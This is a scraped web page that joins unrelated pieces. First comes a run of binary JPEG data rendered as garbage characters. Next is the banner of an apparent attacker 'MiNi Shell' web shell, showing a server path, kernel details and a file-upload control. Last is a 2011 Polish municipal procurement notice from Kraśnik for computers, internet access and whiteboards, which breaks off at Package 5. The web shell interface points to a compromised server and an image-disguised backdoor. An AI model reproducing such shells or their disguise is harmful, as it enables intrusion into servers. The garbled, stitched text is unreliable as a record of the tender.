JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111230/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111230/348549-N-2011.html

<p class="kh_header"><b>Kraśnik: Internet dla mieszkańców Kraśnika</b><br>
<b>Numer ogłoszenia: 348549 - 2011; data zamieszczenia: 30.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Kraśnika , ul. Lubelska 84, 23-200 Kraśnik, woj. lubelskie, tel. 081 8251540, faks 081 8252709.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.krasnik.um.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Internet dla mieszkańców Kraśnika.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia publicznego obejmuje swoim zakresem:
1.	dostawę 97 zestawów komputerowych wraz z oprogramowaniem,
2.	dostawę 2 tablic multimedialnych,
3.	świadczenie usługi bezprzewodowego mobilnego dostępu do sieci Internet na terenie Gminy Miasto Kraśnik dla 65 komputerów wraz dostawą 65 fabrycznie nowych modemów,
4.	świadczenie usługi stałego dostępu do sieci Internet we wskazanych przez Zamawiającego 10 lokalach Jednostek podległych,
5.	świadczenie obsługi serwisowej (maintenance) poza zakresem usługi objętej gwarancją producenta dla 97 komputerów,
6.	świadczenie usługi instalacji oraz pierwszej konfiguracji 97 komputerów w miejscach ich użytkowania - 65 adresów na terenie Gminy Miasta Kraśnik oraz w 10 lokalach Jednostek podległych 
7.	sprzęt i oprogramowanie, urządzenia, materiały muszą być fabrycznie nowe. Wyprodukowane nie później niż w  2010 r., nieużywane, nie eksponowane.






Dostawa zestawów komputerowych, oprogramowania, programu antywirusowego i tablic multimedialnych, świadczenie usługi dostarczenia sygnału Internetu dla  65 gospodarstw domowych oraz 10 jednostek podległych Urzędu Miasta Kraśnik, świadczenie obsługi serwisowej (maintenance) oraz świadczenie usługi instalacji oraz pierwszej konfiguracji 97 komputerów w ramach realizacji Projektu unijnego pt.: Internet dla mieszkańców Kraśnika 

Pakiet 1 - Zestaw komputerowy wraz z oprogramowaniem - 97 sztuk:

1.	Wymagania ogólne:
Przedmiot zamówienia obejmuje swoim zakresem dostawę 97 zestawów komputerowych wraz z oprogramowaniem. Wskazane w specyfikacji znaki towarowe i patenty są uzasadnione specyfiką przedmiotu zamówienia i mają na celu wskazanie jedynie jakości przedmiotu zamówienia. W związku z powyższym Wykonawcy mogą składać oferty równoważne, za które uznane zostaną oferty spełniające wszystkie wymagania Zamawiającego. Wszystkie wymienione wymagania techniczne należy traktować jako minimalne. Obowiązek wykazania, iż oferowany przedmiot zamówienia spełnia wymagania Zamawiającego, leży po stronie Wykonawcy.
	
2.	Parametry zestawów komputerowych:
Lp.	Nazwa komponentu	Minimalne wymagania
1	Typ	Komputer stacjonarny
2	Zastosowanie	Aplikacje biurowe i edukacyjne
3	Procesor	Procesor klasy x86 osiągający według testów PassMark CPU Mark wynik minimum 4000 punktów (Zamawiający wymaga, aby wynik testów zaproponowanego procesora znajdował się na stronie internetowej: http://cpubenchmark.net/cpu.list.php).
4	Chipset	Rekomendowany przez producenta procesora
5	Pamięć	2 x 2GB (DDR3 SDRAM 1333MHz) - możliwość rozbudowy do 16 GB, dwa gniazda na pamięci wolne
6	Płyta główna	Wyposażona w złącza:+ 1 x PCI-Express x 16, 1 x PCI-Express x 1, 1 x PCI
7	Dysk twardy	320GB SATA II 7200 rpm kompatybilny z technologią SMART IV i NCQ
8	Audio	Karta dźwiękowa zgodna z HD Audio
9	Karta sieciowa	Zintegrowana 10/100/1000, WakeOnLan.
10	Karta graficzna	Z dedykowaną pamięcią 512MB GDDR3, zgodna ze standardem DIRECTX 10.0
11	Napęd optyczny	Umożliwiający odczyt i zapis płyt w standardach CD, DVD wraz z dołączonym oprogramowaniem do wypalania płyt.
12	Porty	Wbudowane: 1 x RS232, 1 x VGA; 1 x Display Port, min. 8 x USB 2.0 wyprowadzone na zewnątrz komputera w tym min. 2 z przodu obudowy, port sieciowy RJ-45,
Porty audio: z tyłu wyjście liniowe i wejście liniowe, z przodu port słuchawek i mikrofonu.
Wymagana ilość i rozmieszczenie (na zewnątrz obudowy komputera) portów USB nie może być osiągnięta w wyniku stosowania konwerterów, przejściówek itp.
13	Obudowa	Obudowa metalowa, umożliwiająca pracę w pionie jak i w poziomie oraz montaż dodatkowego dysku wewnętrznego.
Obudowa powinna posiadać czujnik otwarcia współpracujący z oprogramowaniem zarządzająco - diagnostycznym komputera.
Konstrukcja obudowy musi umożliwiać zastosowanie zabezpieczenia fizycznego w postaci złącza dla linki metalowej oraz oczka dla kłódki.
W obudowę komputera musi być wbudowany dźwiękowy i wizualny system diagnostyczny, służący do sygnalizowania i diagnozowania problemów z komputerem i jego komponentami, a w szczególności musi sygnalizować:
a)	Przebieg procedury POST,
b)	Poprawność sum kontrolnych BIOS-u,
c)	Awarię procesora lub pamięci podręcznej procesora,
d)	Uszkodzenie lub braku pamięci RAM, uszkodzenia złączy PCI, kontrolera Video, dysku twardego, płyty głównej, kontrolera USB.
14	Zasilacz	Zasilacz Active PFC zgodny z normą środowiskową Energy Star 5.0, o sprawności 89%, umożliwiający bezproblemową pracę komputera przy pełnym wyposażeniu w dodatkowe urządzenia podpięte poprzez porty i sloty rozszerzeń, przy pełnym obciążeniu.
15	Ergonomia	Głośność komputera przy maksymalnym obciążeniu procesora mierzona z pozycji operatora nie może przekraczać 31 dB.
16	Klawiatura	Klawiatura typu Windows pełnowymiarowa, układ typu QWERTY US, przewodowa, podłączana do portu USB.
17	Mysz	Przewodowa dwu przyciskowa z rolką, podłączana do portu USB.
18	System operacyjny	Zainstalowany system operacyjny klasy PC musi spełniać następujące wymagania poprzez wbudowane mechanizmy, bez użycia dodatkowych aplikacji:
1.	Możliwość zdalnej automatycznej instalacji, konfiguracji, administrowania oraz aktualizowania systemu;   
2.	Zabezpieczony hasłem hierarchiczny dostęp do systemu, konta i profile użytkowników zarządzane zdalnie; praca systemu w trybie ochrony kont użytkowników;
3.	Internetowa aktualizacja zapewniona w języku polskim;
4.	Możliwość dokonywania aktualizacji i poprawek systemu przez Internet z możliwością wyboru instalowanych poprawek;
5.	Darmowe aktualizacje w ramach wersji systemu operacyjnego przez Internet (niezbędne aktualizacje, poprawki, biuletyny bezpieczeństwa muszą być dostarczane bez dodatkowych opłat) - wymagane podanie nazwy strony serwera WWW;
6.	Wbudowana zapora internetowa (firewall) dla ochrony połączeń internetowych; zintegrowana z systemem konsola do zarządzania ustawieniami zapory i regułami IP v4 i v6;  
7.	Zlokalizowane w języku polskim, co najmniej następujące elementy: menu, odtwarzacz multimediów, komunikaty systemowe; 
8.	Wsparcie dla większości powszechnie używanych urządzeń peryferyjnych (drukarek, urządzeń sieciowych, standardów USB, Plug&Play, Wi-Fi);
9.	Zintegrowany z systemem moduł wyszukiwania informacji (plików różnego typu) dostępny z kilku poziomów: poziom menu, poziom otwartego okna systemu operacyjnego; system wyszukiwania oparty na konfigurowalnym przez użytkownika module indeksacji zasobów lokalnych;
10.	Zintegrowane z systemem operacyjnym narzędzia zwalczające złośliwe oprogramowanie; aktualizacje dostępne u producenta nieodpłatnie bez ograniczeń czasowych;
11.	Wbudowany system pomocy w języku polskim;
12.	Możliwość przystosowania stanowiska dla osób niepełnosprawnych (np. słabo widzących); 
13.	Możliwość zarządzania stacją roboczą poprzez polityki - przez politykę rozumiemy zestaw reguł definiujących lub ograniczających funkcjonalność systemu lub aplikacji;
14.	Wsparcie dla logowania przy pomocy smartcard;
15.	System posiada narzędzia służące do administracji, do wykonywania kopii zapasowych polityk i ich odtwarzania oraz generowania raportów z ustawień polityk;
16.	Zdalna pomoc i współdzielenie aplikacji - możliwość zdalnego przejęcia sesji zalogowanego użytkownika celem rozwiązania problemu z komputerem;
17.	Graficzne środowisko instalacji i konfiguracji;
18.	Transakcyjny system plików zapewniający wysoką niezawodność;
19.	Oprogramowanie dla tworzenia kopii zapasowych (Backup); automatyczne wykonywanie kopii plików z możliwością automatycznego przywrócenia wersji wcześniejszej;
20.	Możliwość przywracania plików systemowych;
21.	System operacyjny musi posiadać funkcjonalność pozwalającą na identyfikację sieci komputerowych, do których jest podłączony, zapamiętywanie ustawień i przypisywanie do min. 3 kategorii bezpieczeństwa (z predefiniowanymi odpowiednio do kategorii ustawieniami zapory sieciowej, udostępniania plików itp.);
22.	Możliwość blokowania lub dopuszczania dowolnych urządzeń peryferyjnych za pomocą polityk grupowych (np. przy użyciu numerów identyfikacyjnych sprzętu);
23.	Koszt połączenia do telefonicznego serwisu technicznego powinien być równoważny co najwyżej połączeniu lokalnemu (inaczej: linii 0-801; preferencja: 0-800, linia bezpłatna dla użytkownika końcowego);
24.	Telefoniczne wsparcie techniczne w języku polskim w dni robocze od 8:00 do 17:00  zapewniony przez producenta lub dostawcę co najmniej przez 5 lat od chwili zakupu;
25.	Wymagane jest dostarczenie nośnika z zainstalowanym systemem operacyjnym;
26.	Licencja na system operacyjny musi pozwalać na przekazanie na zasadzie użyczenia sprzętu komputerowego wraz z zainstalowanym systemem operacyjnym.
19	Oprogramowanie dodatkowe	Dołączone przez producenta zestawu oprogramowanie do wykonania kopii bezpieczeństwa systemu operacyjnego i danych użytkownika na dysku twardym i dyskach zewnętrznych np. DVD oraz ich odtworzenie po ewentualnej awarii systemu operacyjnego bez potrzeby jego reinstalacji.
20	BIOS	BIOS musi posiadać możliwość:
a)	odczytania informacji na temat: nazwy i numeru seryjnego komputera, zainstalowanego procesora, pamięci operacyjnej RAM wraz z informacją o obsadzeniu slotów pamięci, obsadzeniu slotów PCI;
b)	monitorowania komponentów komputera - CPU, pamięć, HDD;
c)	informowania o otwarciu obudowy;
d)	skonfigurowania hasła Power On;
e)	ustawienia hasła dostępu do BIOSu (administratora);
f)	blokady i wyłączenia w BIOS-ie portów USB;
g)	kontroli sekwencji boot-ącej;
h)	funkcje blokowania/odblokowania BOOT-owania stacji roboczej z zewnętrznych urządzeń.
21	Certyfikaty	Certyfikat bezpieczeństwa CE
21	Monitor	Monitor o parametrach:
a)	Typ: LCD kolorowy 20 cali panoramiczny z matryca aktywną TFT
b)	Rozmiar plamki: 0,28 mm
c)	Jasność: 250 cd/m2
d)	Kontrast: 1000:1
e)	Rozdzielczość maksymalna: 1600x900
f)	złącza: VGA, DVI zgodne z HDCP
g)	głośniki: stereo z regulacją głośności z przodu
h)	Certyfikaty: Energy Star , ISO 13406-2.
22	Inne	Dodatkowe wymagania:
Listwa zasilająca z min 5 gniazdami dwubiegunowymi ze stykiem ochronnym, wyposażona w zabezpieczenie przeciwprzepięciowe, podświetlany wyłączniki oraz automatyczny bezpiecznik.
Każdy komputer musi posiadać dwie tabliczki znamionowe w miejscach widocznych: 
1.	1 tabliczkę znamionową na monitorze 
2.	1 tabliczkę na obudowie komputera
Tabliczka musi posiadać oznakowanie zgodne z Przewodnikiem w zakresie promocji projektów finansowanych w ramach Programu Operacyjnego Innowacyjna Gospodarka, 2007-2013 dla beneficjentów i instytucji zaangażowanych we wdrażanie Programu znajdującym się na stronie internetowej: http://www.poig.gov.pl/zpfe/. Ponadto na tabliczce należy zawrzeć tekst: Sprzęt komputerowy oraz dostęp do Internetu został sfinansowany w ramach Projekt pt. Internet dla mieszkańców Kraśnika współfinansowanego ze środków Europejskiego Funduszu Rozwoju Regionalnego, Program Operacyjny Innowacyjna Gospodarka, 2007-2013 oraz ze środków budżetu Miasta Kraśnik.
23	Wsparcie techniczne	Dostęp do najnowszych sterowników i uaktualnień na stronie producenta zestawu realizowany poprzez podanie na dedykowanej stronie internetowej producenta numeru seryjnego lub modelu komputera (do oferty należy dołączyć link strony).


3. Warunki gwarancji:
1)	5 - letnia gwarancja producenta świadczona na miejscu u klienta;
2)	gwarancja obejmuje wymianę wadliwego sprzętu na wolny od wad bądź naprawę uszkodzonego sprzętu i udostępnienie na czas naprawy sprzętu zastępczego o równorzędnych parametrach;
3)	Uprawnienia wynikające z gwarancji będą realizowane w siedzibie Zamawiającego;
4)	możliwość zgłaszania awarii w dni robocze w godzinach: od 8:00 do 16:00, telefonicznie, za pomocą faksu i poprzez pocztę elektroniczną;
5)	czas przyjęcia zgłoszenia od Zamawiającego, dotyczącego konieczności usunięcia awarii (usterki) - do końca następnego dnia roboczego;
6)	w przypadku braku możliwości naprawy sprzętu w terminie 5 dni roboczych od dnia zgłoszenia podstawienie sprzętu zastępczego o parametrach równoważnych lub wyższych;
7)	w przypadku wycofania z produkcji zaoferowanego przez Wykonawcę sprzętu, Zamawiający dopuszcza możliwość zamiany przez Wykonawcę modelu zaoferowanego sprzętu, na sprzęt o parametrach równoważnych lub wyższych.
8)	w przypadku awarii dysku twardego w okresie gwarancji, uszkodzony dysk twardy pozostaje u Zamawiającego;
9)	możliwość telefonicznego sprawdzenia konfiguracji sprzętowej komputera oraz warunków gwarancji po podaniu numeru seryjnego bezpośrednio u producenta lub jego przedstawiciela;
10)	 serwis dostarczonych komputerów musi być realizowany przez producenta lub autoryzowanego partnera serwisowego producenta.

Pakiet 2 - Internet mobilny dla 65 gospodarstw domowych:

1. Wymagania ogólne:
Przedmiot zamówienia obejmuje swoim zakresem świadczenie usługi bezprzewodowego mobilnego dostępu do sieci Internet na terenie Gminy Miasto Kraśnik dla 65 komputerów wraz z dostawą 65 fabrycznie nowych modemów. Umowa zostanie zawarta na okres 33 miesięcy, aktywacja usługi nastąpi 21dni po dacie zawarcia Umowy.

2. Lista lokalizacji:
Lista lokalizacji zostanie przekazana Wykonawcy po zakończeniu rekrutacji Beneficjentów Ostatecznych projektu. Adresy lokalizacji będą zawierać się w granicach administracyjnych Gminy Miasta Kraśnik. 

3. Parametry abonamentu:
Lp.	Opis	Parametry
1	Miesięczny limit transferu danych	min. 10 GB
2	Prędkość przesyłania danych (warunki)	Uzależnione od modemu, zasięgu sieci operatora, obciążenia siły nadawczej, siły odbieranego sygnału, warunków atmosferycznych
3	Prędkość po wykorzystaniu limitu transferu danych	Możliwa zmiana parametrów transmisji bez naliczania dodatkowych opłat
4	Stały publiczny adres IP	Tak
5	Połączenia głosowe (w tym roamingu)	Zablokowane
6	Wiadomości SMS/MMS (w tym roamingu)	Zablokowane
7	Wysyłanie i odbieranie danych w roamingu	Zablokowane
8	Wszystkie pozostałe usługi powodujące naliczanie dodatkowych opłat	Zablokowane
9	Usterka kary SIM	Nieodpłatna wymiana
10	Masowe zarządzanie abonamentami poprzez panel administracyjny umożliwiające aktywację, dezaktywację usług, czasową blokadę karty w przypadku zaginięcia lub kradzieży, tworzenie raportów.	Tak
11	Okres trwania Umowy	33 miesiące
12	Okres świadczenia usługi	33 miesiące
13	Termin dostawy modemów i aktywacji abonamentu	do 21 dni po dacie podpisania Umowy

4. Parametry modemów:
Lp.	Opis	Parametry
1	Standard transmisji	HSDPA/HSUPA/UMTS/EDGE/GPRS/GSM
2	Zakres częstotliwości	850/900/1 800/1900/2100 MHz
3	Złącze anteny zewnętrznej	Tak
4	Obsługiwane systemy operacyjne	System operacyjny dostarczony w ramach realizacji pakietu nr 1 z zadania nr 1.
5	Standard połączenia z komputerem	USB
6	Gwarancja	Min. 24 miesiące
7	Aplikacja do obsługi modemu	Sterowniki i aplikacja do obsługi modemu dostarczona na nośniku CD. Zamawiający dopuszcza umieszczenie niezbędnego oprogramowania w pamięci wewnętrznej modemu.

5. Serwis:
1)	Wykonawca zapewni gotowość służb technicznych do usunięcia awarii od poniedziałku do piątku, z wyłączeniem dni ustawowo wolnych od pracy, w godzinach od 8:00 do 16:00.
2)	Wykonawca jest zobowiązany do usunięcia usterki w postaci braku sygnału internetowego w terminie 3 dni roboczych od dnia zgłoszenia (z możliwością przedłużenia tego okresu o czas naprawy urządzeń, na które udzielona jest gwarancja producenta).
3)	Wymiany wadliwych modemów Wykonawca dokona na koszt własny. Czas realizacji: 14 dni roboczych od dnia zawiadomienia Wykonawcy.
4)	Wymiany wadliwych kart SIM Wykonawca dokona na koszt własny. Czas realizacji: 14 dni roboczych od dnia zawiadomienia Wykonawcy.
5)	Z każdej czynności serwisowania, mającej na celu zapewnienie prawidłowego korzystania z usługi, zostanie sporządzony protokół, podpisany przez upoważnionych przedstawicieli Wykonawcy i Zamawiającego, potwierdzający faktyczne usunięcie zgłoszonych awarii (usterek) oraz zawierający w swej treści opis wykonanych prac.
6)	Jeżeli czynności serwisowania, mające na celu zapewnienie prawidłowego korzystania z usługi zostały wykonane zdalnie, to dla potwierdzenia prawidłowego wykonania czynności serwisowania wystarczające będzie podpisanie protokołu wyłącznie przez upoważnionego przedstawiciela Wykonawcy.

Pakiet 3 - Internet przewodowy dla 10 jednostek podległych Urzędowi Miasta Kraśnik:

1. Wymagania ogólne:
Przedmiot zamówienia obejmuje swoim zakresem świadczenie usługi stałego dostępu do Internetu we wskazanych przez Zamawiającego 10 lokalach, zrealizowane poprzez medium kablowe na całej trasie Wykonawca - lokal. Umowa zostanie zawarta na okres 33 miesięcy. Zamawiający przewiduje możliwość instalacji Internetu przewodowego na istniejących w placówkach łączach.

2. Lista lokalizacji:
Lp	Nazwa	Adres
1	Zespół Placówek Oświatowych Nr 1 w Kraśniku	 ul. Kościuszki 23; 23-200 Kraśnik
2	Zespół Placówek Oświatowych Nr 2 w Kraśniku	 ul. Lubelska 10; 23-200 Kraśnik
3	Szkoła Podstawowa Nr 3 w Kraśniku	 ul. Urzędowska 435; 23-200 Kraśnik
4	Szkoła Podstawowa Nr 4 w Kraśniku	 ul. Kolejowa 28; 23-200 Kraśnik
5	Szkoła Podstawowa Nr 5 w Kraśniku	 Al. Niepodległości 54; 23-210 Kraśnik
6	Szkoła Podstawowa Nr 6 w Kraśniku	 ul. Grunwaldzka 2; 23-210 Kraśnik
7	Publiczne Gimnazjum Nr 1 w Kraśniku	 ul. Ks. J. Popiełuszki 1; 23-210 Kraśnik
8	Miejska Biblioteka Publiczna w Kraśniku	 ul. Koszarowa 10a; 23-200 Kraśnik
9	Centrum Kultury i Promocji w Kraśniku	 Al. Niepodległości 44; 23-210 Kraśnik
10	Miejski Ośrodek Pomocy Społecznej w Kraśniku	 ul. Grunwaldzka 4a; 23-210 Kraśnik

3. Parametry abonamentu:
Lp.	Opis	Parametry
1	Typ medium transmisji	Kablowe na całej trasie Wykonawca - lokal
2	Miesięczny limit transferu danych	Brak
3	Prędkość pobierania danych	min. 8 Mbps

4	Prędkość wysyłania danych	min. 1 Mbps

5	Stały publiczny adres IP	Min 1 dla lokalizacji
6	Czas trwania Umowy	33 miesiące
7	Termin aktywacji usługi wraz z dostawą urządzeń końcowych	21 dni od daty podpisania Umowy

4. Parametry urządzeń końcowych (modem/router):
Lp.	Opis	Parametry
1	Wbudowany przełącznik [switch] 		Tak
2	Porty LAN	4 x RJ-45 (10/100Mbps, Auto MDI/MDX)
3	Funkcjonalność	NAT, DHCP serwer, Firewall
4	Bezpieczeństwo	Firewall
5	Zarządzanie	Przez stronę WWW
6	Gwarancja	Min. 24 miesiące

5. Serwis:
1)	W ramach obsługi serwisowej Wykonawca zobowiązuje się do:
a)	usuwania awarii sieci,
b)	usuwania nieprawidłowości w pracy urządzeń końcowych,
c)	konserwacji, naprawy lub wymiany uszkodzonego urządzenia,
d)	posiadania wydzielonego, bezpłatnego, dostępnego bez przerw na stronie internetowej Wykonawcy numeru telefonicznego, umożliwiającego zgłaszanie problemów z siecią przez 24 godziny na dobę, 7 dni w tygodniu. 
2)	Wykonawca zapewni gotowość służb technicznych do usunięcia awarii od poniedziałku do piątku, z wyłączeniem dni ustawowo wolnych od pracy, w godzinach od 8.00 do 16.00
3)	Wykonawca jest zobowiązany do usunięcia usterki w postaci braku sygnału internetowego w terminie 24 godzin od momentu zgłoszenia przez Zamawiającego na numer telefonu podany na stronie internetowej Wykonawcy.
4)	Usunięcie awarii może być uwarunkowane udostępnieniem przez Zamawiającego służbom technicznym Wykonawcy urządzeń i łączy w danym lokalu.
5)	Z każdej czynności serwisowania, mającej na celu zapewnienie prawidłowego korzystania z usługi, zostanie sporządzony protokół, podpisany przez upoważnionych przedstawicieli Wykonawcy i Zamawiającego, potwierdzający faktyczne usunięcie zgłoszonych awarii (usterek) oraz zawierający w swej treści opis wykonanych prac.
6)	Jeżeli czynności serwisowania, mające na celu zapewnienie prawidłowego korzystania z usługi zostały wykonane zdalnie, to dla potwierdzenia prawidłowego wykonania czynności serwisowania wystarczające będzie podpisanie protokołu wyłącznie przez upoważnionego przedstawiciela Wykonawcy.


Pakiet 4 - Tablice multimedialne - 2 sztuki.

1. Wymagania ogólne:
Przedmiot zamówienia obejmuje swoim zakresem dostawę 2 tablic multimedialnych. Wskazane w specyfikacji znaki towarowe i patenty są uzasadnione specyfiką przedmiotu zamówienia i mają na celu wskazanie jedynie jakości przedmiotu zamówienia. W związku z powyższym Wykonawcy mogą składać oferty równoważne, za które uznane zostaną oferty spełniające wszystkie wymagania Zamawiającego. Wszystkie wymienione wymagania techniczne należy traktować jako minimalne. Obowiązek wykazania, iż oferowany przedmiot zamówienia spełnia wymagania Zamawiającego, leży po stronie Wykonawcy.

2. Parametry tablic multimedialnych:
Lp.	Opis	Parametry
1	Przekątna tablicy	min. 87 cali (rozmiar całkowity)
2	Obszar roboczy (mm)	min. 80 cali - 1670x1150 (powierzchnia bez pasków)
3	Proporcje obrazu 	4:3
4	Technologia 	Pozycjonowanie w podczerwieni
5	Zgodność z systemami operacyjnymi 	Windows XP, Vista, 7 (32/64 bit)
6	Podłączenie do komputera / zasilanie	USB
7	Prędkość odczytu współrzędnych 	min.150 punktów/sekundę
8	Wymiary tablicy (mm) 	min. 1800 x 1300 mm
9	Gwarancja 	min. 36 miesięcy
10	Akcesoria standardowe 	3 pisaki, wskaźnik teleskopowy, gąbka, 3 pisaki wodne, kabel USB, oprogramowanie i instrukcja na CD

3. Serwis:
1)	3 - letnia gwarancja producenta świadczona na miejscu u klienta;
2)	gwarancja obejmuje wymianę wadliwego sprzętu na wolny od wad bądź naprawę uszkodzonego sprzętu i udostępnienie na czas naprawy sprzętu zastępczego o równorzędnych parametrach;
3)	Uprawnienia wynikające z gwarancji będą realizowane w siedzibie Zamawiającego;
4)	możliwość zgłaszania awarii w dni robocze w godzinach: od 8:00 do 16:00, telefonicznie, za pomocą faksu i poprzez pocztę elektroniczną;
5)	czas przyjęcia zgłoszenia od Zamawiającego, dotyczącego konieczności usunięcia awarii (usterki) - do końca następnego dnia roboczego;
6)	w przypadku braku możliwości naprawy sprzętu w terminie 5 dni roboczych od dnia zgłoszenia podstawienie sprzętu zastępczego o parametrach równoważnych lub wyższych;
7)	w przypadku wycofania z produkcji zaoferowanego przez Wykonawcę sprzętu, Zamawiający dopuszcza możliwość zamiany przez Wykonawcę modelu zaoferowanego sprzętu, na sprzęt o parametrach równoważnych lub wyższych.
8)	możliwość telefonicznego sprawdzenia konfiguracji sprzętowej tablicy multimedialnej oraz 
warunków gwarancji po podaniu numeru seryjnego bezpośrednio u producenta lub jego przedstawiciela;
9)	serwis dostarczonych tablic multimedialnych musi być realizowany przez producenta lub autoryzowanego partnera serwisowego producenta.


Pakiet 5 - Świadczenie obsługi serwisowej (maintenance) poza zakresem usługi objętej gwarancją producenta dla 97 komputerów.

1.	Wymagania ogólne:
